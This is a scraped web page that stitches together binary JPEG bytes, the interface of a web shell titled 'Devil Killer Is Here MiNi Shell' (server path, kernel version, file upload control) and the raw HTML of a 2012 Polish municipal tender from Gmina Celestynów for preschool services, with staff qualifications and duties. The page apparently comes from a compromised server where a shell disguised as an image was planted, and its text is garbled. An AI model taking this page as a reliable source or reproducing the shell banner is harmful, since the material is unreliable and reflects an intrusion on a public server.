JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121031/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121031/429038-N-2012.html

<p class="kh_header"><b>Celestynów: Świadczenie usług edukacyjnych - przedszkolnych polegających na prowadzeniu zajęć i sprawowania opieki na dziećmi w Przedszkolu Samorządowym w Celestynowie przy ul. Szkolnej 2 w ramach projektu  Celestynowskie Przedszkola Wyrównanych Szans! Program wsparcia na rzecz rozwoju edukacji przedszkolnej w Gminie Celestynów współfinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty</b><br>
<b>Numer ogłoszenia: 429038 - 2012; data zamieszczenia: 31.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Celestynów , ul. Regucka 3, 05-430 Celestynów, woj. mazowieckie, tel. 22 7897060 w. 114, faks 22 7897011.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług edukacyjnych - przedszkolnych polegających na prowadzeniu zajęć i sprawowania opieki na dziećmi w Przedszkolu Samorządowym w Celestynowie przy ul. Szkolnej 2 w ramach projektu  Celestynowskie Przedszkola Wyrównanych Szans! Program wsparcia na rzecz rozwoju edukacji przedszkolnej w Gminie Celestynów współfinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług edukacyjnych - przedszkolnych polegających na prowadzeniu zajęć i sprawowania opieki na dziećmi w Przedszkolu Samorządowym w Celestynowie przy ul. Szkolnej 2 w ramach projektu  Celestynowskie Przedszkola Wyrównanych Szans! Program wsparcia na rzecz rozwoju edukacji przedszkolnej w Gminie Celestynów  współfinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.1 Zmniejszenie nierówności w stopniu upowszechniania edukacji przedszkolnej.
Temat usług edukacyjnych - przedszkolnych, ilość godzin wykonywanych przez poszczególnych Wykonawców;
Część 1 - zajęcia sportowe prowadzone przez nauczyciela - ilość godzin 160.
Część 2 - zajęcia prowadzone przez psychologa dziecięcego - ilość godzin 160.
Część 3 - zajęcia prowadzone przez logopedę - ilość godzin 160.
Część 4 - zajęcia plastyczne prowadzone przez nauczyciela - ilość godzin 200.
Część 5 - zajęcia taneczno-teatralne prowadzone przez nauczyciela - ilość godzin 80.
Część 6 - zajęcia rehabilitacyjne prowadzone przez specjalistę - ilość godzin 80.
Część 7 - opieka sprawowana przez nauczyciela podczas wyjazdów dzieci na basen - 4 wyjazdy w miesiącu przez 5 miesięcy.
Część 8 - opieka sprawowana przez nauczyciela podczas wyjazdów dzieci na basen - 4 wyjazdy w miesiącu przez 5 miesięcy.
Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia ofert wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże, iż dysponuje co najmniej jedną osobą do realizacji każdej części zamówienia posiadającą następujące kwalifikacje tj:

Część 1 - zajęcia sportowe prowadzone przez nauczyciela;
                   - wykształcenie wyższe - kierunek wychowanie fizyczne,
                   - przygotowanie pedagogiczne,
                   - co najmniej roczne doświadczenie zawodowe  w pracy z dziećmi w wieku szkolnym
                     lub przedszkolnym,
          - umiejętność pracy z grupą dzieci,
          - łatwość nawiązywania kontaktów z dziećmi i dorosłymi.

Część 2 - zajęcia prowadzone przez psychologa dziecięcego;
   - wykształcenie wyższe - kierunek psychologia
   - przygotowanie pedagogiczne,
                   - co najmniej roczne doświadczenie zawodowe  w pracy z dziećmi w wieku szkolnym
                     lub przedszkolnym,
          - umiejętność pracy z grupą dzieci,
          - łatwość nawiązywania kontaktów z dziećmi i dorosłymi.

Część 3 - zajęcia prowadzone przez logopedę;
   - wykształcenie wyższe - kierunek oligofrenopedagogika i logopedia
   - przygotowanie pedagogiczne,
   - co najmniej trzyletnie  doświadczenie zawodowe  w pracy z dziećmi w wieku 
     szkolnym lub przedszkolnym,
   - umiejętność pracy z grupą dzieci,
   - łatwość nawiązywania kontaktów z dziećmi i dorosłymi.

Część 4 - zajęcia plastyczne prowadzone przez nauczyciela;
- wykształcenie wyższe - kierunek pedagogika wczesnoszkolna i przedszkolna,
- co najmniej dwuletnie doświadczenie zawodowe  w pracy z dziećmi w wieku szkolnym i    
  przedszkolnym,
- stopień awansu zawodowego: minimum nauczyciel  kontraktowy,	
- umiejętność pracy z grupą dzieci,
- łatwość nawiązywania kontaktów z dziećmi i dorosłymi.

Część 5 - zajęcia taneczno-teatralne prowadzone przez nauczyciela; 
- wykształcenie wyższe,
- przygotowanie pedagogiczne,
- uprawnienia instruktorskie Ministerstwa Kultury i Sztuki (obecnie Ministerstwa Kultury i  
  Dziedzictwa Narodowego),
- co najmniej trzyletnie  doświadczenie  zawodowe w pracy z dziećmi w wieku szkolnym lub 
  przedszkolnym,
    - umiejętność pracy z grupą dzieci,
    - łatwość nawiązywania kontaktów z dziećmi i dorosłymi.


Część 6 - zajęcia rehabilitacyjne prowadzone przez specjalistę;
- wykształcenie min. technik fizjoterapii,
- co najmniej trzyletnie  doświadczenie zawodowe w pracy z dziećmi w wieku szkolnym lub
  przedszkolnym,
- umiejętność pracy z grupą dzieci,
    - łatwość nawiązywania kontaktów z dziećmi i dorosłymi.


Część 7 - opieka sprawowana przez nauczyciela podczas wyjazdów dzieci na basen;
- wykształcenie wyższe,
- przygotowanie pedagogiczne,
- stopień awansu zawodowego: minimum nauczyciel kontraktowy,
- co najmniej trzyletnie doświadczenie zawodowe w pracy z dziećmi w wieku szkolnym lub
   przedszkolnym, 
- umiejętność pracy z grupą dzieci,
- łatwość nawiązywania kontaktów z dziećmi i dorosłymi.

Część 8 - opieka sprawowana przez nauczyciela podczas wyjazdów dzieci na basen;
- wykształcenie wyższe,
- przygotowanie pedagogiczne,
- stopień awansu zawodowego:  minimum nauczyciel kontraktowy,
- co najmniej trzyletnie doświadczenie zawodowe w pracy z dziećmi w wieku szkolnym lub 
  przedszkolnym, 
- umiejętność pracy z grupą dzieci,
- łatwość nawiązywania kontaktów z dziećmi i dorosłymi.


 Wykonawca zobowiązany jest przedłożyć wykaz sporządzony według wzoru stanowiącego Załącznik nr 6 do SIWZ. Wykaz winien zawierać szczegółowe informacje na temat kwalifikacji zawodowych, doświadczenia niezbędnego do wykonania zamówienia.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w niniejszej SIWZ) dołączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień umowy, która może nastąpić                   w trybie przewidzianym przez Pzp za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności, z uwzględnieniem art. 144 ust. 1 Pzp, w następującym zakresie: 
Zmiany terminu płatności z przyczyn niezależnych od Zamawiającego, w tym w szczególności w wyniku zadziałania okoliczności siły wyższej,
Zamawiający dopuszcza także możliwość zmian treści zawartej umowy w następujących okolicznościach:
gdy nastąpi zmiana obowiązujących przepisów prawa w zakresie mającym wpływ                          na realizację przedmiotu zamówienia,
gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym, a inną niż Wykonawca stroną, w szczególności instytucją Zarządzającą, Pośredniczącą I i II stopnia, a także innymi instytucjami, które na podstawie przepisów prawa mogą wpływać na realizację zamówienia,
gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej I i II stopnia,
gdy wystąpią obiektywne przeszkody uniemożliwiające realizację zamówienia lub osiągnięcie jego celów według pierwotnie przyjętego harmonogramu realizacji przedmiotu zamówienia. 
Zmiany umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności.                     
Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.celestynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Celestynów, ul. Regucka 3, 05-430 Celestynów pok. nr 32.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.11.2012 godzina 11:00, miejsce: Biuro Obsługi Mieszkańca Urząd Gminy w Celestynowie, ul. Regucka 3, 05-430 Celestynów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.1 Zmniejszenie nierówności w stopniu upowszechniania edukacji przedszkolnej, tytuł projektu Celestynowskie Przedszkola Wyrównanych Szans! Program wsparcia na rzecz rozwoju edukacji przedszkolnej w Gminie Celestynów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zajęcia sportowe prowadzone przez nauczyciela - ilość godzin 160..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zakresu obowiązków nauczyciela prowadzącego zajęcia sportowe należy:
1.	Objęcie wyznaczonych dzieci zajęciami sportowymi i prowadzenie zajęć w przedszkolu mających na celu rozwój psychoruchowy i emocjonalny dzieci;
2.	Systematyczne prowadzenie zajęć sportowych w grupie pozwalający na rozwój motoryki, poczucie przynależności do grupy, orientację w przestrzeni, koordynację ruchów;
3.	Współpraca z rodzicami, prowadzenie zajęć z udziałem rodziców, w celu demonstrowania ćwiczeń i ustalenie z nimi toku pracy dziecka w domu;
4.	Współpraca z nauczycielami przedszkola w celu dostosowania realizowanych zajęć 
do możliwości dzieci;
5.	Prowadzenie obowiązującej dokumentacji (dziennik zajęć indywidualnych, karty diagnozy, terapii, obserwacje dzieci, kontakty z rodzicami);
6.	Wprowadzanie pisemnych metod pracy z dziećmi i rodzicami/opiekunami prawnymi.
7.   Przestrzeganie Statutu Przedszkola Samorządowego, regulaminów oraz procedur obowiązujących w przedszkolu,
8. Ścisła współpraca z nauczycielami pracującymi z dziećmi w przedszkolu;
9. Dokumentowanie podejmowanych  działań;
10.	Współpraca z kadrą zarządzającą projektem oraz dyrektorem i kadrą pedagogiczną przedszkola;
11.	Stosowanie się do zakresu zadań wyszczególnionych w umowie i regulaminów obowiązujących w przedszkolu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zajęcia prowadzone przez psychologa dziecięcego - ilość godzin 160..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zakresu obowiązków psychologa dziecięcego należy:
1.	Objęcie specjalistyczną opieką psychologiczną  wyznaczonych dzieci i prowadzenie zajęć w przedszkolu;
2.	Systematyczne prowadzenie warsztatów psychologicznych mających na celu wspomaganie wszechstronnego rozwoju przedszkolaków, w szczególności;
a)	Rozwijanie ich inteligencji emocjonalnej;
b)	Umiejętność współpracy i działania w grupie,
c)	Kształtowanie adekwatnej samooceny,
d)	Zachowania agresywne i przemoc,
e)	Rozwiązywanie konfliktów
f)	Omówienie trudnych sytuacji spotykanych na co dzień ( choroba, rozstanie rodziców, śmierć)
3.	Współpraca z rodzicami, prowadzenie zajęć z udziałem rodziców;
4.	Prowadzenie doradztwa psychologicznego;
5.	Prowadzenie warsztatów psychologicznych dla nauczycieli, rodziców i dzieci;
6.	Prowadzenie obowiązującej dokumentacji (dziennik zajęć indywidualnych, karty diagnozy,  obserwacje dzieci, kontakty z rodzicami);
7.	Systematyczne wzbogacanie wiedzy z zakresu psychologii;
8.	Wprowadzanie pisemnych metod pracy z dziećmi i rodzicami/opiekunami prawnymi.
9.  Przestrzeganie Statutu Przedszkola Samorządowego, regulaminów oraz procedur obowiązujących w przedszkolu,
10.  Ścisła współpraca z nauczycielami pracującymi z dziećmi w przedszkolu;
11.  Dokumentowanie podejmowanych  działań;
12. 	Współpraca z kadrą zarządzającą projektem oraz dyrektorem i kadrą pedagogiczną przedszkola;
13.	Stosowanie się do zakresu zadań wyszczególnionych w umowie i regulaminów obowiązujących w przedszkolu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zajęcia prowadzone przez logopedę - ilość godzin 160.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zakresu obowiązków Logopedy należy:
1.	Objęcie opieką logopedyczną wyznaczonych dzieci i prowadzenie zajęć w przedszkolu;
2.	Systematyczne prowadzenie zajęć logopedycznych w grupie;
3.	Współpraca z rodzicami, prowadzenie zajęć z udziałem rodziców, w celu demonstrowania ćwiczeń i ustalenie z nimi toku pracy dziecka w domu;
4.	Prowadzenie doradztwa logopedycznego, kącika logopedycznego;
5.	Prowadzenie warsztatów logopedycznych dla nauczycieli, rodziców i dzieci;
6.	Niwelowanie wad wymowy, ćwiczenia w likwidowaniu wad narządów mowy;
7.	Współpraca z nauczycielami przedszkola w celu dostosowania realizowanych treści 
do możliwości dzieci;
8.	Prowadzenie obowiązującej dokumentacji (dziennik zajęć indywidualnych, karty diagnozy, terapii, obserwacje dzieci, kontakty z rodzicami;
9.	Wprowadzanie pisemnych metod pracy z dziećmi i rodzicami/opiekunami prawnymi.
10.	Przestrzeganie Statutu Przedszkola Samorządowego, regulaminów oraz procedur obowiązujących w przedszkolu,
11.	Ścisła współpraca z nauczycielami pracującymi z dziećmi w przedszkolu;
12.	Dokumentowanie podejmowanych  działań;
13.	Współpraca z kadrą zarządzającą projektem oraz dyrektorem i kadrą pedagogiczną przedszkola;
14.	Stosowanie się do zakresu zadań wyszczególnionych w umowie i regulaminów obowiązujących w przedszkolu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zajęcia plastyczne prowadzone przez nauczyciela - ilość godzin 200..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zakresu obowiązków nauczyciela prowadzącego zajęcia plastyczne należy:
1.	Wsparcie rozwoju dzieci umiejętności twórczego doświadczania świata poprzez zabawę z plastyką;
2.	Poznanie technik malarskich i rysunkowych przez dzieci;
a)	malowanie farbami plakatowymi, akwarelami, akrylowymi,
b)	rysowanie kredkami, pastelami olejnymi, węglem,
c)	lepienie w plastelinie, glinie,
d)	praca z papierem - scraping, qulling, wydzieranki i wycinanki,
e)	kompozycje przestrzenne z zastosowaniem różnych materiałów,
f)	collage z zastosowaniem różnych materiałów.
3.	Poznanie terminów plastycznych;
4.	Prowadzenie warsztatów przy użyciu różnych materiałów;
5.	Współpraca z rodzicami, prowadzenie zajęć z udziałem rodziców, w celu demonstrowania ćwiczeń; 
6.	Współpraca z nauczycielami przedszkola w celu dostosowania realizowanych treści 
do możliwości dzieci;
7.	Prowadzenie obowiązującej dokumentacji (dziennik zajęć indywidualnych, kontakty z rodzicami;
8.  Przestrzeganie Statutu Przedszkola Samorządowego, regulaminów oraz procedur obowiązujących w przedszkolu,
9.  Ścisła współpraca z nauczycielami pracującymi z dziećmi w przedszkolu;
